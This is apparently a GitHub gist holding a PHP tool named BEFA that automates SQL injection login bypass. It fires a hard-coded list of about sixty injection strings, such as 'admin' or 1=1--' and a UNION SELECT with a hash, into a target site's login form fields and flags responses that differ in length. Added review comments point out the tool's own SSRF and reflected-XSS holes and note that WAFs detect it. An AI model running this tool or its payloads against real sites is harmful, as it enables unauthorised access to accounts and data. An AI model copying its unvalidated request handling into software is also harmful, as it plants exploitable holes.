@RedToor
Last active October 18, 2016 06:04
[Bypass Head for authentication]
<?php
/*
Coder : [f][t] \ RedToor
Project: BEFA [Bypass Head for authentication]
Date 1 : 11/08/2014 Vs 1
Date 2 : 11/19/2014 Vs 2
Date 3 : 10/18/2016 Vs 3
how it works
www.target.com
/
www.target.com/admin/login.php -> <form name="form" action="verify.php" method="post">
User <input type="text" name="username">
Pass <input type="text" name="password">
<input type="submit" value="login"></form>
/
www.target.com/admin/verify.php [username&password]
/
POST /admin/verify.php HTTP/1.1
Host: www.target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: number of letters
username={payload}&password=password{payload}
/
verify.php
/
MYSQL -> "SELECT * FROM users WHERE username='{payload}' AND password='{payload}'"
/
RESULT (YES) (NO)
*/
// Flat script, single entry point. With no HOST posted it renders the
// parameter form below; otherwise it replays each string in $payload into the
// two named form fields of http://HOST/URL and prints one table row per
// attempt, flagging responses whose size differs from the ones seen before.
//
// NOTE(review): every parameter is taken verbatim from $_POST, and HOST/URL
// are used unvalidated to build the outbound URL passed to file_get_contents()
// further down. Hosted as-is, this page lets any visitor make the server issue
// requests to arbitrary hosts (SSRF / open relay), so it must never be
// reachable on a shared or Internet-facing server.
// Defensive note: a single run issues dozens of login attempts within seconds,
// all carrying textbook strings, which login rate limiting and standard WAF
// rule sets flag readily.
//
// error_reporting(0) hides the notices that undefined $_POST keys and a failed
// outbound request would otherwise raise, so every failure below is silent.
error_reporting(0);
// Data
// Form parameters; none is validated, trimmed or escaped.
$HOST=$_POST['HOST'];   // target host; an "http://" prefix and all "/" are stripped later
$URL=$_POST['URL'];     // path appended after the host
$DATA1=$_POST['DATA1']; // name of the first form field (receives each payload)
$DATA2=$_POST['DATA2']; // name of the second form field (receives the same payload)
$DATA3=$_POST['DATA3']; // optional extra field name ...
$DATA4=$_POST['DATA4']; // ... and its fixed value
$TYPE=$_POST['TYPE'];   // "POST", or anything else (treated as GET)
// empty() is also true for the string "0".
if (empty($HOST))
{
// NOTE(review): the form's action below echoes $_SERVER['PHP_SELF'] without
// htmlspecialchars(). PHP_SELF can include request-supplied path info, so this
// is a reflected-XSS sink in the tool's own page.
?>
<!-- Script by RedToor -->
<title>Befa By RedToor</title>
<table width="100%" border="0" height="100%" cellspacing="0">
<td valign="middle">
<div align="center">
<OBJECT classid>
<h1><font style="font-family: fantasy">Bypass Head for authentication</font></h1>
<form method="POST" action="<?php echo $_SERVER['PHP_SELF'] ?>"><pre>
HOST : <input type="text" name="HOST" placeholder="www.target.com" > As www.target.com .
PATH : <input type="text" name="URL" placeholder="admin/verify.php" > As admin/login.php .
INPUT NAME : <input type="text" name="DATA1" placeholder="username" > As user .
INPUT NAME 2: <input type="text" name="DATA2" placeholder="passwd" > As pass .
INPUT NAME 3: <input type="text" name="DATA3" placeholder="other" size="7">=<input type="text" name="DATA4" placeholder="value" size="7"> As other [If need] .
so user=[payload]&pass=[payload]&other=value
METHOD: POST<input type="radio" name="TYPE" value="POST" checked="checked"> GET<input type="radio" name="TYPE" value="GET">
<br><input type="submit" value="Start"></form>
</pre>
<?php
}else{
// ----------------------------------------------------------- Payloads
// Hard-coded list; the first entry, "test", is a benign baseline whose
// response size the following ones are compared against (see the loop).
$payload=array(
"test",
"0' or 0=0'#",
"' or ''='",
"' or ''=''",
"0' or '0'=0'#",
"0' or ''='#",
"' or ''='#",
"1' or '1'=1'#",
"1'1",
"1 EXEC SP_ (or EXEC XP_)",
"1 AND 1=1",
"or 1=1",
"or 1=1--",
"or 1=1#",
"or 1=1/*",
"admin",
"admin' --",
"admin' #",
"admin'/*",
"admin' or '1'='1",
"admin' or '1'='1'--",
"admin' or '1'='1'#",
"admin' or '1'='1'/*",
"admin' or 1=1 or ''='",
"admin' or 1=1",
"admin' or 1=1--",
"admin' or 1=1#",
"admin' or 1=1/*",
"admin') or ('1'='1",
"admin') or ('1'='1'--",
"admin') or ('1'='1'#",
"admin') or ('1'='1'/*",
"admin') or '1'='1",
"admin') or '1'='1'--",
"admin') or '1'='1'#",
"admin') or '1'='1'/*",
"1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",
"admin\" --",
"admin\" #",
"admin\"/*",
"admin\" or \"1\"=\"1\"",
"admin\" or \"1\"=\"1\"--\"",
"admin\" or \"1\"=\"1\"#",
"admin\" or \"1\"=\"1\"/*",
"admin\"or 1=1 or \"\"=\"",
"admin\" or 1=1",
"admin\" or 1=1--",
"admin\" or 1=1#",
"admin\" or 1=1/*",
"admin\") or (\"1\"=\"1",
"admin\") or (\"1\"=\"1\"--",
"admin\") or (\"1\"=\"1\"#",
"admin\") or (\"1\"=\"1\"/*",
"admin\") or \"1\"=\"1\"",
"admin\") or \"1\"=\"1\"--",
"admin\") or \"1\"=\"1\"#",
"admin\") or \"1\"=\"1\"/*",
"1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055",
);
// ----------------------------------------------------------- Payloads
// Only an "http://" prefix is recognised; when present it is removed together
// with every "/" in HOST, so any path typed into HOST is flattened.
$ver=strpos($HOST, "http://");
if($ver===false){}else{$HOST=str_replace("http://", "", $HOST);$HOST=str_replace("/", "", $HOST);}
print '<br><title>Befa By RedToor</title><center><h3><font style="font-family: fantasy">B.E.F.A</font></h3></center><div align="center">';
// POST sends a form-urlencoded body. Any other value means GET, but $inputs is
// still sent as a request body with a text/html Content-type and is never
// appended to the URL built below.
if($TYPE=="POST"){$TYPE="application/x-www-form-urlencoded";$METHOD="POST";}else{$TYPE="text/html";$METHOD="GET";}
echo '<table border="2px"> <tr>
<td>Payload</td>
<td>Lentgh</td>
<td>Probability</td>
</tr>';
$check=0;     // size of the previous response (0 before the first request)
$last_fail=0; // size carried over from the last iteration that was flagged YES
foreach ($payload as $pay) {
// Both named fields receive the same payload; the optional third field gets
// its fixed value. If DATA1 and DATA2 are equal they collapse into one key.
$inputs = http_build_query(
array(
''.$DATA1.'' => $pay,
''.$DATA2.'' => $pay,
''.$DATA3.'' => $DATA4
)
);
// Stream-context options for the outbound request: method, header, body.
$payloads = array('http' =>
array(
'method' => $METHOD,
'header' => "Content-type: ".$TYPE,
'content' => $inputs
)
);
$context = stream_context_create($payloads);
// Returns false on any failure (unreachable host, HTTP error status); with
// error_reporting(0) that is silent and is measured below as size 0.
$request = file_get_contents("http://".$HOST."/".$URL, false, $context);
// Heuristic: a row is marked YES when its size differs from both the previous
// response ($check) and $last_fail; $last_fail then takes the previous size.
// strlen(utf8_decode()) approximates a character count rather than a byte
// count; utf8_decode() is deprecated as of PHP 8.2.
if ($check!=strlen(utf8_decode($request)) and $last_fail!=strlen(utf8_decode($request))){$status="<i>YES</i>";$last_fail=$check;}else{$status="NO";}
// The baseline "test" row is measured but never printed.
if ($pay!="test"){
echo "<tr><td>".$pay."</td>";
echo "<td>".strlen(utf8_decode($request))."</td>";
echo "<td>".$status."</td></tr>";
}
$check = strlen(utf8_decode($request)); // carried into the next iteration's comparison
}echo "</table>";
}
?>